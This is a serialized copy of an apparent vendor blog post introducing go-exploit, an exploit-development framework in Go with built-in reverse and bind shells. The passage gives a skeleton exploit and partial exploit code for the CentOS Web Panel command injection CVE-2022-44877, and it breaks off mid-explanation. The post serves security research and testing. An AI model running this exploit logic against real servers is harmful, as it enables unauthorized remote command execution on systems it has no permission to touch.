malware.",{"slug":96699},"fake-repos-deliver-malicious-implant","\u002Fblog\u002Ffake-repos-deliver-malicious-implant",{"title":95224,"description":96697},"blog\u002Ffake-repos-deliver-malicious-implant","4dNQuzwy91SJB5tCc7Mu7yVqaaFevkpDC-fR1p_bsLg",{"id":96705,"title":96706,"articles":7,"authors":96707,"body":96709,"date":98679,"description":98680,"extension":234,"image":7,"link":7,"meta":98681,"navigation":237,"path":98682,"seo":98683,"series":7,"stem":98684,"subtype":7,"tags":7,"__hash__":98685},"blog\u002Fblog\u002Fgo-exploit.md","Introducing go-exploit - An Exploit Framework for Go",[96708],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":96710,"toc":98671},[96711,96724,96727,96739,96743,96802,96808,96814,96840,96843,97207,97228,97261,97264,97289,97299,97305,97311,97323,97469,97475,97495,97501,97521,97953,97964,98380,98383,98386,98649,98651,98668],[18,96712,96713,96714,10515,96718,96720,96721,96723],{},"VulnCheck is excited to announce the open-source release of our ",[47,96715,96717],{"href":14297,"rel":96716},[51],"in-house exploit framework,",[886,96719,20558],{},". Designed with simplicity and portability in mind, ",[886,96722,20558],{}," empowers exploit developers to create compact, self-contained, and consistent exploits.",[18,96725,96726],{},"Many proof-of-concept exploits rely on interpreted languages with complicated packaging systems. They implement wildly differing user interfaces, and have limited ability to be executed within a target network. Some exploits are integrated into massive frameworks that are burdened by years of features and dependencies which overwhelm developers and hinder the attacker's ability to deploy the exploits from unconventional locations.",[18,96728,96729,96730,96732,96733,96738],{},"To overcome these challenges, ",[886,96731,20558],{}," offers a lightweight framework with minimal dependencies, written in ",[47,96734,96737],{"href":96735,"rel":96736},"https:\u002F\u002Fgo.dev\u002F",[51],"Go","—a language renowned for its portability and cross-compilation capabilities. The framework strikes a balance between simplicity for rapid proof-of-concept development and the inclusion of sophisticated built-in features for operational use.",[61,96740,96742],{"id":96741},"key-features-and-capabilities","Key Features and Capabilities",[1789,96744,96745,96754,96760,96768,96774,96782],{},[25,96746,96747,96750,96751,96753],{},[295,96748,96749],{},"Cross-Platform Portability:"," Developed in Go, ",[886,96752,20558],{}," offers seamless cross-platform compatibility. Whether you need to execute the exploit on Windows, Linux, macOS, or an embedded system, the framework ensures consistent functionality across different operating systems, thanks to Go's ability to compile to native executables.",[25,96755,96756,96759],{},[295,96757,96758],{},"A Single Executable:"," Each exploit compiles down to a single native executable, free from external dependencies. Due to the design of the framework, unused (or unwanted) features are completely eliminated from the compiled binary.",[25,96761,96762,10515,96765,96767],{},[295,96763,96764],{},"Defined Exploitation Stages:",[886,96766,20558],{}," introduces a structured approach to exploitation with three distinct stages: target validation, version checking, and exploitation. This clear separation allows exploit developers to focus on specific aspects of the exploit development process, enhancing efficiency and code organization.",[25,96769,96770,96773],{},[295,96771,96772],{},"Consistent User Interface:"," The framework defines a flexible yet consistent user interface that abstracts away complexities, providing a streamlined experience for exploit developers and users.",[25,96775,96776,10515,96779,96781],{},[295,96777,96778],{},"Builtin Command and Control:",[886,96780,20558],{}," includes built-in logic for establishing connections to bind shells or accepting encrypted or unencrypted reverse shells.",[25,96783,96784,10515,96787,96789,96790,96792,96793,1246,96796,96801],{},[295,96785,96786],{},"Pre-defined Payloads:",[886,96788,20558],{}," comes with a collection of pre-created exploit payloads including traditional “lolbin” reverse shells and bind shells, as well as more complicated payloads like Java gadgets. ",[886,96791,20558],{}," also contains all the infrastructure needed for exploiting JNDI LDAP issues (e.g. ",[47,96794,83636],{"href":83634,"rel":96795},[51],[47,96797,96800],{"href":96798,"rel":96799},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-21839",[51],"CVE-2023-21839",", etc).",[61,96803,96805,96806],{"id":96804},"creating-an-exploit-with-go-exploit","Creating an Exploit with ",[886,96807,20558],{},[18,96809,96810,96811,96813],{},"Developing a new exploit using ",[886,96812,20558],{}," is designed to be a straightforward and efficient process. At a high level, the exploit developer only needs to create four essential functions:",[1789,96815,96816,96822,96828,96834],{},[25,96817,96818,96821],{},[886,96819,96820],{},"main()",": This function is responsible for configuring the exploit type and defining the supported command and control options.",[25,96823,96824,96827],{},[886,96825,96826],{},"ValidateTarget()",": The purpose of this function is to validate that the target system meets the criteria of the intended victim.",[25,96829,96830,96833],{},[886,96831,96832],{},"CheckVersion()",": This function is used to confirm that the target system is a susceptible host by checking its version or specific characteristics.",[25,96835,96836,96839],{},[886,96837,96838],{},"RunExploit()",": In this function, the exploitation logic is implemented, enabling the actual exploitation of the target system.",[18,96841,96842],{},"To provide a starting point, a skeleton exploit follows the structure outlined below:",[1354,96844,96846],{"className":19022,"code":96845,"language":19024,"meta":219,"style":219},"package main\n\nimport (\n \"github.com\u002Fvulncheck-oss\u002Fgo-exploit\"\n \"github.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fc2\"\n \"github.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fconfig\"\n)\n\ntype MyExploit struct{}\n\nfunc (sploit MyExploit) ValidateTarget(conf *config.Config) bool {\n return false\n}\n\nfunc (sploit MyExploit) CheckVersion(conf *config.Config) exploit.VersionCheckType {\n return exploit.NotImplemented\n}\n\nfunc (sploit MyExploit) RunExploit(conf *config.Config) bool {\n return true\n}\n\nfunc main() {\n supportedC2 := []c2.Impl{\n c2.SimpleShellServer,\n c2.SimpleShellClient,\n }\n conf := config.New(config.CodeExecution, supportedC2, \"My Target\", \"CVE-2023-1270\", 80)\n\n sploit := MyExploit{}\n exploit.RunProgram(sploit, conf)\n}\n",[886,96847,96848,96854,96858,96864,96872,96881,96890,96894,96898,96910,96914,96948,96954,96958,96962,97001,97012,97016,97020,97052,97058,97062,97066,97076,97093,97104,97115,97119,97169,97173,97184,97203],{"__ignoreMap":219},[1373,96849,96850,96852],{"class":1375,"line":1376},[1373,96851,19031],{"class":1397},[1373,96853,19034],{"class":14938},[1373,96855,96856],{"class":1375,"line":220},[1373,96857,6520],{"emptyLinePlaceholder":237},[1373,96859,96860,96862],{"class":1375,"line":1266},[1373,96861,19043],{"class":4636},[1373,96863,4803],{"class":1383},[1373,96865,96866,96868,96870],{"class":1375,"line":1852},[1373,96867,19050],{"class":1387},[1373,96869,84172],{"class":19053},[1373,96871,19057],{"class":1387},[1373,96873,96874,96876,96879],{"class":1375,"line":4692},[1373,96875,19050],{"class":1387},[1373,96877,96878],{"class":19053},"github.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fc2",[1373,96880,19057],{"class":1387},[1373,96882,96883,96885,96888],{"class":1375,"line":4724},[1373,96884,19050],{"class":1387},[1373,96886,96887],{"class":19053},"github.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fconfig",[1373,96889,19057],{"class":1387},[1373,96891,96892],{"class":1375,"line":4756},[1373,96893,11875],{"class":1383},[1373,96895,96896],{"class":1375,"line":4768},[1373,96897,6520],{"emptyLinePlaceholder":237},[1373,96899,96900,96902,96905,96908],{"class":1375,"line":4792},[1373,96901,26399],{"class":1397},[1373,96903,96904],{"class":14938}," MyExploit",[1373,96906,96907],{"class":1397}," struct",[1373,96909,20595],{"class":1383},[1373,96911,96912],{"class":1375,"line":4798},[1373,96913,6520],{"emptyLinePlaceholder":237},[1373,96915,96916,96918,96920,96922,96925,96927,96930,96932,96934,96936,96938,96940,96942,96944,96946],{"class":1375,"line":4806},[1373,96917,19088],{"class":1397},[1373,96919,4641],{"class":1383},[1373,96921,38094],{"class":19096},[1373,96923,96924],{"class":14938},"MyExploit",[1373,96926,2230],{"class":1383},[1373,96928,96929],{"class":7297}," ValidateTarget",[1373,96931,1384],{"class":1383},[1373,96933,38107],{"class":19096},[1373,96935,19113],{"class":1397},[1373,96937,38112],{"class":14938},[1373,96939,59],{"class":1383},[1373,96941,38117],{"class":14938},[1373,96943,2230],{"class":1383},[1373,96945,16303],{"class":7293},[1373,96947,4765],{"class":1383},[1373,96949,96950,96952],{"class":1375,"line":4817},[1373,96951,7340],{"class":4636},[1373,96953,16195],{"class":14985},[1373,96955,96956],{"class":1375,"line":4825},[1373,96957,1855],{"class":1383},[1373,96959,96960],{"class":1375,"line":4835},[1373,96961,6520],{"emptyLinePlaceholder":237},[1373,96963,96964,96966,96968,96970,96972,96974,96977,96979,96981,96983,96985,96987,96989,96991,96994,96996,96999],{"class":1375,"line":4843},[1373,96965,19088],{"class":1397},[1373,96967,4641],{"class":1383},[1373,96969,38094],{"class":19096},[1373,96971,96924],{"class":14938},[1373,96973,2230],{"class":1383},[1373,96975,96976],{"class":7297}," CheckVersion",[1373,96978,1384],{"class":1383},[1373,96980,38107],{"class":19096},[1373,96982,19113],{"class":1397},[1373,96984,38112],{"class":14938},[1373,96986,59],{"class":1383},[1373,96988,38117],{"class":14938},[1373,96990,2230],{"class":1383},[1373,96992,96993],{"class":14938}," exploit",[1373,96995,59],{"class":1383},[1373,96997,96998],{"class":14938},"VersionCheckType",[1373,97000,4765],{"class":1383},[1373,97002,97003,97005,97007,97009],{"class":1375,"line":4849},[1373,97004,7340],{"class":4636},[1373,97006,96993],{"class":4640},[1373,97008,59],{"class":1383},[1373,97010,97011],{"class":4640},"NotImplemented\n",[1373,97013,97014],{"class":1375,"line":4877},[1373,97015,1855],{"class":1383},[1373,97017,97018],{"class":1375,"line":4915},[1373,97019,6520],{"emptyLinePlaceholder":237},[1373,97021,97022,97024,97026,97028,97030,97032,97034,97036,97038,97040,97042,97044,97046,97048,97050],{"class":1375,"line":4931},[1373,97023,19088],{"class":1397},[1373,97025,4641],{"class":1383},[1373,97027,38094],{"class":19096},[1373,97029,96924],{"class":14938},[1373,97031,2230],{"class":1383},[1373,97033,38102],{"class":7297},[1373,97035,1384],{"class":1383},[1373,97037,38107],{"class":19096},[1373,97039,19113],{"class":1397},[1373,97041,38112],{"class":14938},[1373,97043,59],{"class":1383},[1373,97045,38117],{"class":14938},[1373,97047,2230],{"class":1383},[1373,97049,16303],{"class":7293},[1373,97051,4765],{"class":1383},[1373,97053,97054,97056],{"class":1375,"line":4947},[1373,97055,7340],{"class":4636},[1373,97057,38077],{"class":14985},[1373,97059,97060],{"class":1375,"line":4952},[1373,97061,1855],{"class":1383},[1373,97063,97064],{"class":1375,"line":6776},[1373,97065,6520],{"emptyLinePlaceholder":237},[1373,97067,97068,97070,97072,97074],{"class":1375,"line":6781},[1373,97069,19088],{"class":1397},[1373,97071,19186],{"class":7297},[1373,97073,7514],{"class":1383},[1373,97075,4765],{"class":1383},[1373,97077,97078,97081,97083,97085,97087,97089,97091],{"class":1375,"line":7524},[1373,97079,97080],{"class":4640}," supportedC2 ",[1373,97082,20584],{"class":1397},[1373,97084,66801],{"class":1383},[1373,97086,26421],{"class":14938},[1373,97088,59],{"class":1383},[1373,97090,66808],{"class":14938},[1373,97092,8904],{"class":1383},[1373,97094,97095,97098,97100,97102],{"class":1375,"line":7530},[1373,97096,97097],{"class":4640}," c2",[1373,97099,59],{"class":1383},[1373,97101,38204],{"class":4640},[1373,97103,9062],{"class":1383},[1373,97105,97106,97108,97110,97113],{"class":1375,"line":7546},[1373,97107,97097],{"class":4640},[1373,97109,59],{"class":1383},[1373,97111,97112],{"class":4640},"SimpleShellClient",[1373,97114,9062],{"class":1383},[1373,97116,97117],{"class":1375,"line":7571},[1373,97118,4795],{"class":1383},[1373,97120,97121,97124,97126,97128,97130,97133,97135,97137,97139,97141,97143,97145,97147,97149,97152,97154,97156,97158,97161,97163,97165,97167],{"class":1375,"line":7598},[1373,97122,97123],{"class":4640}," conf ",[1373,97125,20584],{"class":1397},[1373,97127,66851],{"class":4640},[1373,97129,59],{"class":1383},[1373,97131,97132],{"class":7297},"New",[1373,97134,1384],{"class":1383},[1373,97136,38112],{"class":4640},[1373,97138,59],{"class":1383},[1373,97140,66907],{"class":4640},[1373,97142,5437],{"class":1383},[1373,97144,66912],{"class":4640},[1373,97146,5437],{"class":1383},[1373,97148,4883],{"class":1387},[1373,97150,97151],{"class":1391},"My Target",[1373,97153,183],{"class":1387},[1373,97155,5437],{"class":1383},[1373,97157,4883],{"class":1387},[1373,97159,97160],{"class":1391},"CVE-2023-1270",[1373,97162,183],{"class":1387},[1373,97164,5437],{"class":1383},[1373,97166,69795],{"class":5467},[1373,97168,11875],{"class":1383},[1373,97170,97171],{"class":1375,"line":7615},[1373,97172,6520],{"emptyLinePlaceholder":237},[1373,97174,97175,97178,97180,97182],{"class":1375,"line":7635},[1373,97176,97177],{"class":4640}," sploit ",[1373,97179,20584],{"class":1397},[1373,97181,96904],{"class":14938},[1373,97183,20595],{"class":1383},[1373,97185,97186,97189,97191,97193,97195,97197,97199,97201],{"class":1375,"line":7640},[1373,97187,97188],{"class":4640}," exploit",[1373,97190,59],{"class":1383},[1373,97192,66972],{"class":7297},[1373,97194,1384],{"class":1383},[1373,97196,66977],{"class":4640},[1373,97198,5437],{"class":1383},[1373,97200,20633],{"class":4640},[1373,97202,11875],{"class":1383},[1373,97204,97205],{"class":1375,"line":7648},[1373,97206,1855],{"class":1383},[18,97208,97209,97210,982,97212,97215,97216,97219,97220,97222,97223,982,97225,97227],{},"To build the skeleton exploit, you'll need to create a ",[886,97211,84443],{},[886,97213,97214],{},"go.sum"," file for the project. This can be done using the ",[886,97217,97218],{},"go mod"," command. The following commands will download and validate the most recent version of ",[886,97221,20558],{}," and create the necessary ",[886,97224,84443],{},[886,97226,97214],{}," files:",[1354,97229,97231],{"className":31740,"code":97230,"language":2186,"meta":219,"style":219},"go mod init github.com\u002Fusername\u002Fexample\nGO111MODULE=on go mod tidy\n",[886,97232,97233,97245],{"__ignoreMap":219},[1373,97234,97235,97237,97239,97242],{"class":1375,"line":1376},[1373,97236,19024],{"class":2206},[1373,97238,84674],{"class":1391},[1373,97240,97241],{"class":1391}," init",[1373,97243,97244],{"class":1391}," github.com\u002Fusername\u002Fexample\n",[1373,97246,97247,97250,97252,97255,97257,97259],{"class":1375,"line":220},[1373,97248,97249],{"class":4640},"GO111MODULE",[1373,97251,5417],{"class":1397},[1373,97253,97254],{"class":1391},"on",[1373,97256,84629],{"class":2206},[1373,97258,84674],{"class":1391},[1373,97260,84677],{"class":1391},[18,97262,97263],{},"To compile the skeleton exploit, you can use a simple command like the one shown below:",[1354,97265,97267],{"className":31740,"code":97266,"language":2186,"meta":219,"style":219},"GO111MODULE=on go build -o exploit .\u002Fmain.go\n",[886,97268,97269],{"__ignoreMap":219},[1373,97270,97271,97273,97275,97277,97279,97282,97284,97286],{"class":1375,"line":1376},[1373,97272,97249],{"class":4640},[1373,97274,5417],{"class":1397},[1373,97276,97254],{"class":1391},[1373,97278,84629],{"class":2206},[1373,97280,97281],{"class":1391}," build",[1373,97283,39692],{"class":2209},[1373,97285,96993],{"class":1391},[1373,97287,97288],{"class":1391}," .\u002Fmain.go\n",[18,97290,97291,97292,97294,97295,97298],{},"Running this command will compile the skeleton exploit, and the resulting executable will be named ",[886,97293,22852],{},". If you want to customize the output filename, you can change the value after the ",[886,97296,97297],{},"-o"," flag.",[18,97300,97301,97302,97304],{},"Now that you have the instructions for setting up and compiling your ",[886,97303,20558],{}," exploit, let's move on to a real example to further illustrate its usage.",[61,97306,74207,97308,97310],{"id":97307},"a-go-exploit-for-cve-2022-44877",[886,97309,20558],{}," for CVE-2022-44877",[18,97312,97313,97314,97319,97320,97322],{},"In this section, we will examine an example exploit for ",[47,97315,97318],{"href":97316,"rel":97317},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-44877",[51],"CVE-2022-44877"," (CentOS Web Panel). CVE-2022-44877 is a trivial unauthenticated and remote command injection vulnerability so it’s great as a simple example. Let's start with the exploit's ",[886,97321,96820],{}," function:",[1354,97324,97326],{"className":19022,"code":97325,"language":19024,"meta":219,"style":219},"func main() {\n supportedC2 := []c2.Impl{\n c2.SSLShellServer,\n c2.SimpleShellServer,\n c2.SimpleShellClient,\n }\n conf := config.New(config.CodeExecution, supportedC2, \"CentOS Web Panel\", \"CVE-2022-44877\", 2031)\n sploit := CWPInjection{}\n exploit.RunProgram(sploit, conf)\n}\n",[886,97327,97328,97338,97354,97364,97374,97384,97388,97436,97447,97465],{"__ignoreMap":219},[1373,97329,97330,97332,97334,97336],{"class":1375,"line":1376},[1373,97331,19088],{"class":1397},[1373,97333,19186],{"class":7297},[1373,97335,7514],{"class":1383},[1373,97337,4765],{"class":1383},[1373,97339,97340,97342,97344,97346,97348,97350,97352],{"class":1375,"line":220},[1373,97341,97080],{"class":4640},[1373,97343,20584],{"class":1397},[1373,97345,66801],{"class":1383},[1373,97347,26421],{"class":14938},[1373,97349,59],{"class":1383},[1373,97351,66808],{"class":14938},[1373,97353,8904],{"class":1383},[1373,97355,97356,97358,97360,97362],{"class":1375,"line":1266},[1373,97357,97097],{"class":4640},[1373,97359,59],{"class":1383},[1373,97361,85566],{"class":4640},[1373,97363,9062],{"class":1383},[1373,97365,97366,97368,97370,97372],{"class":1375,"line":1852},[1373,97367,97097],{"class":4640},[1373,97369,59],{"class":1383},[1373,97371,38204],{"class":4640},[1373,97373,9062],{"class":1383},[1373,97375,97376,97378,97380,97382],{"class":1375,"line":4692},[1373,97377,97097],{"class":4640},[1373,97379,59],{"class":1383},[1373,97381,97112],{"class":4640},[1373,97383,9062],{"class":1383},[1373,97385,97386],{"class":1375,"line":4724},[1373,97387,4795],{"class":1383},[1373,97389,97390,97392,97394,97396,97398,97400,97402,97404,97406,97408,97410,97412,97414,97416,97419,97421,97423,97425,97427,97429,97431,97434],{"class":1375,"line":4756},[1373,97391,97123],{"class":4640},[1373,97393,20584],{"class":1397},[1373,97395,66851],{"class":4640},[1373,97397,59],{"class":1383},[1373,97399,97132],{"class":7297},[1373,97401,1384],{"class":1383},[1373,97403,38112],{"class":4640},[1373,97405,59],{"class":1383},[1373,97407,66907],{"class":4640},[1373,97409,5437],{"class":1383},[1373,97411,66912],{"class":4640},[1373,97413,5437],{"class":1383},[1373,97415,4883],{"class":1387},[1373,97417,97418],{"class":1391},"CentOS Web Panel",[1373,97420,183],{"class":1387},[1373,97422,5437],{"class":1383},[1373,97424,4883],{"class":1387},[1373,97426,97318],{"class":1391},[1373,97428,183],{"class":1387},[1373,97430,5437],{"class":1383},[1373,97432,97433],{"class":5467}," 2031",[1373,97435,11875],{"class":1383},[1373,97437,97438,97440,97442,97445],{"class":1375,"line":4768},[1373,97439,97177],{"class":4640},[1373,97441,20584],{"class":1397},[1373,97443,97444],{"class":14938}," CWPInjection",[1373,97446,20595],{"class":1383},[1373,97448,97449,97451,97453,97455,97457,97459,97461,97463],{"class":1375,"line":4792},[1373,97450,97188],{"class":4640},[1373,97452,59],{"class":1383},[1373,97454,66972],{"class":7297},[1373,97456,1384],{"class":1383},[1373,97458,66977],{"class":4640},[1373,97460,5437],{"class":1383},[1373,97462,20633],{"class":4640},[1373,97464,11875],{"class":1383},[1373,97466,97467],{"class":1375,"line":4798},[1373,97468,1855],{"class":1383},[18,97470,97471,97472,97474],{},"There are two important aspects in the ",[886,97473,96820],{}," function. First, the exploit informs the framework about the supported command and control variants. This particular exploit supports three variants:",[1789,97476,97477,97483,97489],{},[25,97478,97479,97482],{},[886,97480,97481],{},"c2.SSLShellServer"," (default): An encrypted reverse shell.",[25,97484,97485,97488],{},[886,97486,97487],{},"c2.SimpleShellServer",": An unencrypted reverse shell.",[25,97490,97491,97494],{},[886,97492,97493],{},"c2.SimpleShellClient",": An unencrypted bind shell.",[18,97496,97497,97498,97500],{},"Additionally, the exploit specifies that it is a ",[886,97499,66907],{}," exploit, which means it will run code directly on the victim host. The exploit type affects the command line interface and determines which command and control options are supported. Refer to our documentation for information on other exploit types.",[18,97502,97503,97504,982,97507,97510,97511,97516,97517,97520],{},"For this example, we will skip the ",[886,97505,97506],{},"ValidateTarget",[886,97508,97509],{},"CheckVersion"," functions (you can find their implementations in our ",[47,97512,97515],{"href":97513,"rel":97514},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Ftree\u002Fmain\u002Fexamples\u002Fcve-2022-44877",[51],"GitHub examples","), and instead, focus on the ",[886,97518,97519],{},"RunExploit"," function. It looks like this:",[1354,97522,97524],{"className":19022,"code":97523,"language":19024,"meta":219,"style":219},"func (sploit CWPInjection) RunExploit(conf *config.Config) bool {\n generated, ok := generatePayload(conf)\n if !ok {\n return false\n }\n\n loginAttempt := map[string]string{\n \"username\": \"%72%6f%6F%74\", \u002F\u002F root encoded\n \"password\": random.RandLetters(8),\n \"commit\": \"Login\",\n }\n target := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, \"\u002Flogin\u002Findex.php\")\n output.PrintSuccess(\"Sending exploit to \" + target)\n\n \u002F\u002F t=1 ET bypass\n resp, _, ok := protocol.HTTPSendAndRecvURLEncoded(\"POST\", target+\"?t=1&login=\"+generated, loginAttempt)\n if !ok {\n return false\n }\n\n if resp.StatusCode != 200 {\n output.PrintfError(\"Received an unexpected HTTP status code: %d\", resp.StatusCode)\n\n return false\n }\n output.PrintStatus(\"Done\")\n\n return true\n}\n",[886,97525,97526,97559,97579,97589,97596,97600,97604,97623,97655,97677,97697,97701,97749,97773,97777,97782,97836,97846,97852,97856,97860,97876,97905,97909,97915,97919,97939,97943,97949],{"__ignoreMap":219},[1373,97527,97528,97530,97532,97534,97537,97539,97541,97543,97545,97547,97549,97551,97553,97555,97557],{"class":1375,"line":1376},[1373,97529,19088],{"class":1397},[1373,97531,4641],{"class":1383},[1373,97533,38094],{"class":19096},[1373,97535,97536],{"class":14938},"CWPInjection",[1373,97538,2230],{"class":1383},[1373,97540,38102],{"class":7297},[1373,97542,1384],{"class":1383},[1373,97544,38107],{"class":19096},[1373,97546,19113],{"class":1397},[1373,97548,38112],{"class":14938},[1373,97550,59],{"class":1383},[1373,97552,38117],{"class":14938},[1373,97554,2230],{"class":1383},[1373,97556,16303],{"class":7293},[1373,97558,4765],{"class":1383},[1373,97560,97561,97564,97566,97568,97570,97573,97575,97577],{"class":1375,"line":220},[1373,97562,97563],{"class":4640}," generated",[1373,97565,5437],{"class":1383},[1373,97567,20610],{"class":4640},[1373,97569,20584],{"class":1397},[1373,97571,97572],{"class":7297}," generatePayload",[1373,97574,1384],{"class":1383},[1373,97576,38107],{"class":4640},[1373,97578,11875],{"class":1383},[1373,97580,97581,97583,97585,97587],{"class":1375,"line":1266},[1373,97582,4695],{"class":4636},[1373,97584,7370],{"class":1397},[1373,97586,20662],{"class":4640},[1373,97588,8904],{"class":1383},[1373,97590,97591,97594],{"class":1375,"line":1852},[1373,97592,97593],{"class":4636}," return",[1373,97595,16195],{"class":14985},[1373,97597,97598],{"class":1375,"line":4692},[1373,97599,4795],{"class":1383},[1373,97601,97602],{"class":1375,"line":4724},[1373,97603,6520],{"emptyLinePlaceholder":237},[1373,97605,97606,97609,97611,97613,97615,97617,97619,97621],{"class":1375,"line":4756},[1373,97607,97608],{"class":4640}," loginAttempt ",[1373,97610,20584],{"class":1397},[1373,97612,90333],{"class":1397},[1373,97614,7035],{"class":1383},[1373,97616,15752],{"class":7293},[1373,97618,15050],{"class":1383},[1373,97620,15752],{"class":7293},[1373,97622,8904],{"class":1383},[1373,97624,97625,97628,97630,97632,97634,97636,97639,97642,97645,97648,97650,97652],{"class":1375,"line":4768},[1373,97626,97627],{"class":1387}," \"",[1373,97629,4870],{"class":1391},[1373,97631,183],{"class":1387},[1373,97633,4606],{"class":1383},[1373,97635,4883],{"class":1387},[1373,97637,97638],{"class":37971},"%72%",[1373,97640,97641],{"class":1391},"6f",[1373,97643,97644],{"class":37971},"%6F",[1373,97646,97647],{"class":1391},"%74",[1373,97649,183],{"class":1387},[1373,97651,5437],{"class":1383},[1373,97653,97654],{"class":4630}," \u002F\u002F root encoded\n",[1373,97656,97657,97659,97661,97663,97665,97667,97669,97671,97673,97675],{"class":1375,"line":4792},[1373,97658,97627],{"class":1387},[1373,97660,86310],{"class":1391},[1373,97662,183],{"class":1387},[1373,97664,4606],{"class":1383},[1373,97666,38269],{"class":4640},[1373,97668,59],{"class":1383},[1373,97670,38274],{"class":7297},[1373,97672,1384],{"class":1383},[1373,97674,37681],{"class":5467},[1373,97676,17933],{"class":1383},[1373,97678,97679,97681,97684,97686,97688,97690,97693,97695],{"class":1375,"line":4798},[1373,97680,97627],{"class":1387},[1373,97682,97683],{"class":1391},"commit",[1373,97685,183],{"class":1387},[1373,97687,4606],{"class":1383},[1373,97689,39881],{"class":1387},[1373,97691,97692],{"class":1391},"Login",[1373,97694,183],{"class":1387},[1373,97696,9062],{"class":1383},[1373,97698,97699],{"class":1375,"line":4806},[1373,97700,4795],{"class":1383},[1373,97702,97703,97706,97708,97710,97712,97714,97716,97718,97720,97722,97724,97726,97728,97730,97732,97734,97736,97738,97740,97742,97745,97747],{"class":1375,"line":4817},[1373,97704,97705],{"class":4640}," target ",[1373,97707,20584],{"class":1397},[1373,97709,20615],{"class":4640},[1373,97711,59],{"class":1383},[1373,97713,20638],{"class":7297},[1373,97715,1384],{"class":1383},[1373,97717,38107],{"class":4640},[1373,97719,59],{"class":1383},[1373,97721,38145],{"class":4640},[1373,97723,5437],{"class":1383},[1373,97725,20633],{"class":4640},[1373,97727,59],{"class":1383},[1373,97729,38154],{"class":4640},[1373,97731,5437],{"class":1383},[1373,97733,20633],{"class":4640},[1373,97735,59],{"class":1383},[1373,97737,38163],{"class":4640},[1373,97739,5437],{"class":1383},[1373,97741,4883],{"class":1387},[1373,97743,97744],{"class":1391},"\u002Flogin\u002Findex.php",[1373,97746,183],{"class":1387},[1373,97748,11875],{"class":1383},[1373,97750,97751,97753,97755,97758,97760,97762,97765,97767,97769,97771],{"class":1375,"line":4825},[1373,97752,20669],{"class":4640},[1373,97754,59],{"class":1383},[1373,97756,97757],{"class":7297},"PrintSuccess",[1373,97759,1384],{"class":1383},[1373,97761,183],{"class":1387},[1373,97763,97764],{"class":1391},"Sending exploit to ",[1373,97766,183],{"class":1387},[1373,97768,15478],{"class":1397},[1373,97770,49264],{"class":4640},[1373,97772,11875],{"class":1383},[1373,97774,97775],{"class":1375,"line":4835},[1373,97776,6520],{"emptyLinePlaceholder":237},[1373,97778,97779],{"class":1375,"line":4843},[1373,97780,97781],{"class":4630}," \u002F\u002F t=1 ET bypass\n",[1373,97783,97784,97786,97788,97790,97792,97794,97796,97798,97800,97803,97805,97807,97809,97811,97813,97815,97817,97819,97822,97824,97826,97829,97831,97834],{"class":1375,"line":4849},[1373,97785,37858],{"class":4640},[1373,97787,5437],{"class":1383},[1373,97789,91080],{"class":4640},[1373,97791,5437],{"class":1383},[1373,97793,20610],{"class":4640},[1373,97795,20584],{"class":1397},[1373,97797,20615],{"class":4640},[1373,97799,59],{"class":1383},[1373,97801,97802],{"class":7297},"HTTPSendAndRecvURLEncoded",[1373,97804,1384],{"class":1383},[1373,97806,183],{"class":1387},[1373,97808,6946],{"class":1391},[1373,97810,183],{"class":1387},[1373,97812,5437],{"class":1383},[1373,97814,49264],{"class":4640},[1373,97816,15448],{"class":1397},[1373,97818,183],{"class":1387},[1373,97820,97821],{"class":1391},"?t=1&login=",[1373,97823,183],{"class":1387},[1373,97825,15448],{"class":1397},[1373,97827,97828],{"class":4640},"generated",[1373,97830,5437],{"class":1383},[1373,97832,97833],{"class":4640}," loginAttempt",[1373,97835,11875],{"class":1383},[1373,97837,97838,97840,97842,97844],{"class":1375,"line":4877},[1373,97839,4695],{"class":4636},[1373,97841,7370],{"class":1397},[1373,97843,20662],{"class":4640},[1373,97845,8904],{"class":1383},[1373,97847,97848,97850],{"class":1375,"line":4915},[1373,97849,97593],{"class":4636},[1373,97851,16195],{"class":14985},[1373,97853,97854],{"class":1375,"line":4931},[1373,97855,4795],{"class":1383},[1373,97857,97858],{"class":1375,"line":4947},[1373,97859,6520],{"emptyLinePlaceholder":237},[1373,97861,97862,97864,97866,97868,97870,97872,97874],{"class":1375,"line":4952},[1373,97863,4695],{"class":4636},[1373,97865,37927],{"class":4640},[1373,97867,59],{"class":1383},[1373,97869,37932],{"class":4640},[1373,97871,15677],{"class":1397},[1373,97873,6610],{"class":5467},[1373,97875,4765],{"class":1383},[1373,97877,97878,97881,97883,97885,97887,97889,97891,97893,97895,97897,97899,97901,97903],{"class":1375,"line":6776},[1373,97879,97880],{"class":4640}," output",[1373,97882,59],{"class":1383},[1373,97884,37961],{"class":7297},[1373,97886,1384],{"class":1383},[1373,97888,183],{"class":1387},[1373,97890,37968],{"class":1391},[1373,97892,37972],{"class":37971},[1373,97894,183],{"class":1387},[1373,97896,5437],{"class":1383},[1373,97898,37927],{"class":4640},[1373,97900,59],{"class":1383},[1373,97902,37983],{"class":4640},[1373,97904,11875],{"class":1383},[1373,97906,97907],{"class":1375,"line":6781},[1373,97908,6520],{"emptyLinePlaceholder":237},[1373,97910,97911,97913],{"class":1375,"line":7524},[1373,97912,97593],{"class":4636},[1373,97914,16195],{"class":14985},[1373,97916,97917],{"class":1375,"line":7530},[1373,97918,4795],{"class":1383},[1373,97920,97921,97923,97925,97928,97930,97932,97935,97937],{"class":1375,"line":7546},[1373,97922,20669],{"class":4640},[1373,97924,59],{"class":1383},[1373,97926,97927],{"class":7297},"PrintStatus",[1373,97929,1384],{"class":1383},[1373,97931,183],{"class":1387},[1373,97933,97934],{"class":1391},"Done",[1373,97936,183],{"class":1387},[1373,97938,11875],{"class":1383},[1373,97940,97941],{"class":1375,"line":7571},[1373,97942,6520],{"emptyLinePlaceholder":237},[1373,97944,97945,97947],{"class":1375,"line":7598},[1373,97946,7340],{"class":4636},[1373,97948,38077],{"class":14985},[1373,97950,97951],{"class":1375,"line":7615},[1373,97952,1855],{"class":1383},[18,97954,2245,97955,97957,97958,97961,97962,4606],{},[886,97956,97519],{}," function generates the required payload using the 